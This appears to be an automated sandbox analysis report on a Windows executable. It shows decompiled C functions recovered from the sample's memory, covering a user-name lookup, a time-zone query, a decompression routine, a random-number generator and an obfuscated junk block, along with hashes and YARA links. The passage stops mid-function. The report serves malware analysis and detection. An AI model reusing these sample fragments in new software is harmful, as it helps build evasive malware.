0x0040aa2f
0x0040aa2f
0x0040aa35
0x00000000
0x0040aa35
0x0040a91f
0x0040a920
0x0040a920
0x0040a925
0x0040a928
0x0040a929
0x0040a92f
0x00000000
0x00000000
0x0040a935
0x0040a93a
0x0040a93d
0x0040a93e
0x0040a943
0x0040a948
0x0040aa12
0x0040aa12
0x0040aa18
0x00000000
0x0040aa18
0x0040a94e
0x0040a952
0x0040a956
0x0040a95d
0x0040a960
0x0040a961
0x0040a970
0x00000000
0x00000000
0x0040a976
0x0040a987
0x0040a98a
0x0040a990
0x0040a995
0x0040a9f6
0x0040a9fd
0x0040a9fd
0x0040aa03
0x00000000
0x00000000
0x0040aa03
0x00000000
0x0040a9f6
0x0040a99f
0x0040a9a5
0x0040a9bf
0x0040a9c3
0x0040a9c5
0x0040a9c5
0x0040a9c7
0x0040a9c9
0x0040a9ec
0x0040a9ec
0x00000000
0x0040a9c9
0x0040a9a7
0x0040a9ae
0x0040a9b4
0x0040a9b7
0x0040a9bd
0x00000000
0x00000000
0x00000000
0x0040a9bd
0x00000000
0x0040a9ae
0x0040aa09
0x0040aa0f
0x00000000
0x0040aa1b
0x0040aa1b
0x0040aa20
0x0040aa24
0x0040aa2c
0x00000000
0x0040aa2c
0x0040a89c
0x0040a8a1
0x00000000
0x0040a8a3
0x0040a8a3
0x00000000
0x0040a8a3

APIs

CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?), ref: 0040A892

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: fd6d80ddc1a88f460db875b9c6e04280f16d348fa4b0f49693f4bce4ee3000a7
Instruction ID: e5f870759dab17c5d03ae21c1e850a2771498fc7beee0647b5f106428c32a445
Opcode Fuzzy Hash: fd6d80ddc1a88f460db875b9c6e04280f16d348fa4b0f49693f4bce4ee3000a7
Instruction Fuzzy Hash: CA515D71A00309ABDB10DBA1C884AEFB778EF88714F1444AAE505FB2C1E779ED42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041D595, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041D595(signed short* __eax, void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int* _t7;
				void* _t8;
				signed short* _t9;
				signed int _t10;
				signed int _t13;
				signed short _t14;
				void* _t15;

				_t16 = __eax;
				_t7 =  &_v8;
				_v8 = 0x104;
				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
				if(_t7 == 0) {
					L8:
					_t8 = 6;
					_t9 = E0040FA33(_t8, _t16);
				} else {
					_t10 = _v8;
					if(_t10 == 0) {
						goto L8;
					} else {
						 *((short*)(__eax + _t10 * 2)) = 0;
						_t9 = __eax;
						if( *((intOrPtr*)(__eax)) != 0) {
							do {
								_t13 =  *_t9 & 0x0000ffff;
								if(_t13 == 0x2f || _t13 == 0x5c) {
									_t14 = 0x7c;
									 *_t9 = _t14;
								}
								_t9 =  &(_t9[1]);
							} while ( *_t9 != 0);
						}
					}
				}
				return _t9;
			}

0x0041d59a
0x0041d59c
0x0041d5a3
0x0041d5aa
0x0041d5b2
0x0041d5e6
0x0041d5e8
0x0041d5e9
0x0041d5b4
0x0041d5b4
0x0041d5b9
0x00000000
0x0041d5bb
0x0041d5bd
0x0041d5c1
0x0041d5c6
0x0041d5c8
0x0041d5c8
0x0041d5ce
0x0041d5d7
0x0041d5d8
0x0041d5d8
0x0041d5db
0x0041d5de
0x0041d5e4
0x0041d5c6
0x0041d5b9
0x0041d5f0

APIs

GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D6EC,?,?,00000000), ref: 0041D5AA

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 16b9c979eba87bd0766cd185d71447ef519bffe0d1067e8b5d33f47e65585074
Instruction ID: 9c09c427fb3b4b6d23918dac1030fa52aab09456243a78482960d22f1a9e8b23
Opcode Fuzzy Hash: 16b9c979eba87bd0766cd185d71447ef519bffe0d1067e8b5d33f47e65585074
Instruction Fuzzy Hash: 6DF0F0B1B04200BADB346B14D802AEBB3BADF05758F10045BF002DB2D0E6B88EC0C368

Uniqueness

Uniqueness Score: -1.00%

Function 004164D2, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004164D2() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x004164d3
0x004164e1
0x004164ea
0x004164f4
0x00416501
0x004164f6
0x004164f6
0x00000000
0x004164f6
0x004164ec
0x004164ec
0x004164f9
0x004164fc
0x004164fc
0x00416507

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 004164E1

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: fb1614529a2ca94a20516896b80b13449183988355c13b843054bef5f99da4ae
Instruction ID: 68433d06efe2d18851ceb11f122dd1e131cd8b78d7dfadfef2c0dac4487c590a
Opcode Fuzzy Hash: fb1614529a2ca94a20516896b80b13449183988355c13b843054bef5f99da4ae
Instruction Fuzzy Hash: 44E0CD3154410CDBDF20DFA8EE459DD77F9A711304F310826F501F7140D22CE985864B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A63, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E00401A63(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x00401a63
0x00401a63
0x00401a63
0x00401a65
0x00401a67
0x00401a69
0x00401a6d
0x00401a6f
0x00401a71
0x00401a75
0x00401a78
0x00401a7a
0x00401a7b
0x00401a7d
0x00401a82
0x00401a83
0x00401a85
0x00401a85
0x00401a88
0x00401a8a
0x00401a8c
0x00401a8c
0x00401a8d
0x00401a90
0x00401a92
0x00401a93
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401a9d
0x00401aa1
0x00401aa7
0x00401aa9
0x00401aab
0x00401aad
0x00401aaf
0x00401ab1
0x00401ab3
0x00401ab5
0x00401ab9
0x00401abc
0x00401abd
0x00401ac0
0x00401ac1
0x00401ac4
0x00401ac5
0x00401ac8
0x00401ac9
0x00401acc
0x00401ace
0x00401ad0
0x00401ad9
0x00401ae1
0x00401ae3
0x00401aea
0x00401aeb
0x00401af3
0x00401b01
0x00401b07
0x00401b09
0x00401b0e
0x00401b11
0x00401b17
0x00401b19
0x00401b1b
0x00401b1f
0x00401b27
0x00401b2c
0x00401b34
0x00401b35
0x00401b37
0x00401b3f
0x00401b4a
0x00401b4b
0x00401b51
0x00401b5b
0x00401b63
0x00401b7c
0x00401b85
0x00401b8a
0x00401b93
0x00401b95
0x00401b99
0x00401b9b
0x00401ba4
0x00401ba8
0x00401bab
0x00401bb0
0x00401bb1
0x00401bb4
0x00401bb9
0x00401bbb
0x00401bc1
0x00401bc3
0x00401bc9
0x00401bcb
0x00401bd1
0x00401bd3
0x00401bdb
0x00401be3
0x00401beb
0x00401bf3
0x00401bfb
0x00401c03
0x00401c0b
0x00401c13
0x00401c1b
0x00401c23
0x00401c2b
0x00401c33
0x00401c39
0x00401c3d
0x00401c49
0x00401c4d
0x00401c6f
0x00401cb5
0x00401cb7
0x00401cbe
0x00401ccc

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 55d3e9609bf348a9fb4723383907df3ddc6c7a765dd6061a9ac0a72b1461db3b
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 7581B5319893918BCB95DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 004190FB, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E004190FB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x00419102
0x00419106
0x0041910b
0x0041910d
0x00419110
0x00000000
0x00419117
0x00419119
0x0041912c
0x0041912e
0x00419131
0x00419132
0x0041911b
0x0041911b
0x00419122
0x00419122
0x00419137
0x00419142
0x00419145
0x00419148
0x00419149
0x00419149
0x00000000
0x00419149
0x0041914e
0x00419155
0x00419157
0x00419165
0x0041916c
0x0041916f
0x00419170
0x00419159
0x00419159
0x00419160
0x00419160
0x00419179
0x0041917e
0x0041918c
0x00419193
0x00419196
0x00419197
0x00419180
0x00419180
0x00419187
0x00419187
0x0041919a
0x0041919e
0x004191a4
0x004191a6
0x004191c5
0x004191c5
0x004191ca
0x004191db
0x004191e0
0x004191e8
0x004191e9
0x004191cc
0x004191cc
0x004191d6
0x004191d6
0x004191ee
0x004191fc
0x00419203
0x00419206
0x00419207
0x004191f0
0x004191f0
0x004191f7
0x004191f7
0x0041920d
0x00419210
0x00419215
0x00419217
0x0041921e
0x00419220
0x00419233
0x00419235
0x00419238
0x00419239
0x00419222
0x00419222
0x00419229
0x00419229
0x00419242
0x00419247
0x00419255
0x0041925c
0x0041925f
0x00419260
0x00419249
0x00419249
0x00419250
0x00419250
0x00419263
0x00419267
0x00419267
0x00419273
0x00419277
0x0041927a
0x00419282
0x00419287
0x0041928d
0x00419290
0x00419291
0x00419294
0x0041929c
0x0041929f
0x004192a0
0x004192a3
0x004192a3
0x004192a3
0x004192a8
0x00000000
0x004192a8
0x004191b5
0x004191b7
0x004191bb
0x004191c1
0x004191c2
0x00000000
0x004191c2
0x004192b0
0x004192bb
0x004192c2
0x004192c2

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction ID: a489a378778222c108fe8a20f86dfbba30c169a164a547a7ba1a429a0153e299
Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction Fuzzy Hash: F951E632E04926ABDB14CE58C4602EDF7B1EF85324F1A42AACD06BF385C674ADC1D784

Uniqueness

Uniqueness Score: -1.00%

Function 00417559, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00417559() {
				signed int _t23;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x424018;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x423648[_t59] = (( *(0x42364c + _t59 * 4) ^ 0x423648[_t59]) & 0x7fffffff ^ 0x423648[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x42364c + _t59 * 4) ^ 0x423648[_t59]) & 0x7fffffff ^ 0x423648[_t59]) & 0x00000001) * 4) ^  *(0x423c7c + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x423648[_t64]);
						do {
							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x424004);
					}
					 *0x424004 = (( *0x423648 ^  *0x424004) & 0x7fffffff ^  *0x424004) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423648 ^  *0x424004) & 0x7fffffff ^  *0x424004) & 0x00000001) * 4) ^  *0x423c78;
					_t23 = 0;
				}
				 *0x424018 = _t23 + 1;
				return (0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00417559
0x00417563
0x0041756b
0x00417572
0x00417572
0x004175a0
0x004175a1
0x004175a8
0x004175b6
0x004175b8
0x004175bf
0x004175de
0x004175e0
0x004175e3
0x004175bf
0x00417612
0x00417617
0x00417617
0x00417621
0x0041764c

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a0806b874a270439345c9ed2c6980d9dac03ec74414907bfa786a47eb1a62f
Instruction ID: b4d4bd1b5ba987959425564b8a172c545b52f2395b3a9ab3e94b0888c2bd3430
Opcode Fuzzy Hash: 19a0806b874a270439345c9ed2c6980d9dac03ec74414907bfa786a47eb1a62f
Instruction Fuzzy Hash: 33219D32721400ABD338DF3DEC65A5533F2E38935939A443DD616C32A0DA3AEA438B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E636, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 141cc07d909ea3e942c3ee2bd1691bdf5ab195add67bf5742ceffabbebb77c8f
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: EAE0DF7B3000108BC750CE12E480943B7A2FBE8330B528EB5C81587346C938EDC38AD5

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB6F, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041CB6F(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
